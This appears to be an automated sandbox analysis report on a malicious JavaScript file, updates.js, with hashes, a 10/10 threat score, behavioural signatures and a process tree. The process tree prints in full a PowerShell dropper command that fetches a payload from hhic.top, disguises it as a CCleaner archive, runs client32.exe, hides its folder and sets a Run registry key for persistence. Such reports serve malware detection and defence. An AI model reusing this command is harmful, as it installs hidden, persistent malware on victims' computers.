Analysis
-
max time kernel
119s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
26-07-2024 20:11
Static task
static1
Behavioral task
behavioral1
Sample
updates.js
Resource
win7-20240708-en
windows7-x64
7 signatures
150 seconds
Behavioral task
behavioral2
Sample
updates.js
Resource
win10v2004-20240709-en
windows10-2004-x64
14 signatures
150 seconds
General
-
Target
updates.js
-
Size
2.7MB
-
MD5
1b17ec51d8be6e80d530e36aa0f8bb41
-
SHA1
65aa99559627a07851e2f21aa465a4dc10e84e02
-
SHA256
b36668956d6f6f8f789d39130d8b45f6794ec91b9a6b895512af6f88181a1f81
-
SHA512
daf20dfbde0d7660cef950641697c239ac7fb6c5d7f928b5c5396cd578ed7e130b78f21db80a9721573807f6a02e6fbd8f9e46695803cac1fb2694e1a1d2166a
-
SSDEEP
49152:DA4yxjzCgTpCffzZtrCP7sQs0iy/ss7+ZdhN6j4GusjtWsDtzXY7aIvJLwKXq2XI:4
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://hhic.top/data.php?11163
exe.dropper
http://hhic.top/data.php?11163
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 2484 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2484 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2484 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2484 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2628 wrote to memory of 2484 2628 wscript.exe 31 PID 2628 wrote to memory of 2484 2628 wscript.exe 31 PID 2628 wrote to memory of 2484 2628 wscript.exe 31
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\updates.js1⤵
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $WYTHVQSDZ='http://hhic.top/data.php?11163';$DOUVB=(New-Object System.Net.WebClient).DownloadString($WYTHVQSDZ);$CFBBFY=[System.Convert]::FromBase64String($DOUVB);$asd = Get-Random -Minimum -10 -Maximum 17; $WGYZUKPIEE=[System.Environment]::GetFolderPath('ApplicationData')+'\CPALDR'+$asd;if (!(Test-Path $WGYZUKPIEE -PathType Container)) { New-Item -Path $WGYZUKPIEE -ItemType Directory };$p=Join-Path $WGYZUKPIEE 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$CFBBFY);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$WGYZUKPIEE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $WGYZUKPIEE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $WGYZUKPIEE -Force; $fd.attributes='Hidden';$s=$WGYZUKPIEE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HPRKEQMGKMK';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2484
-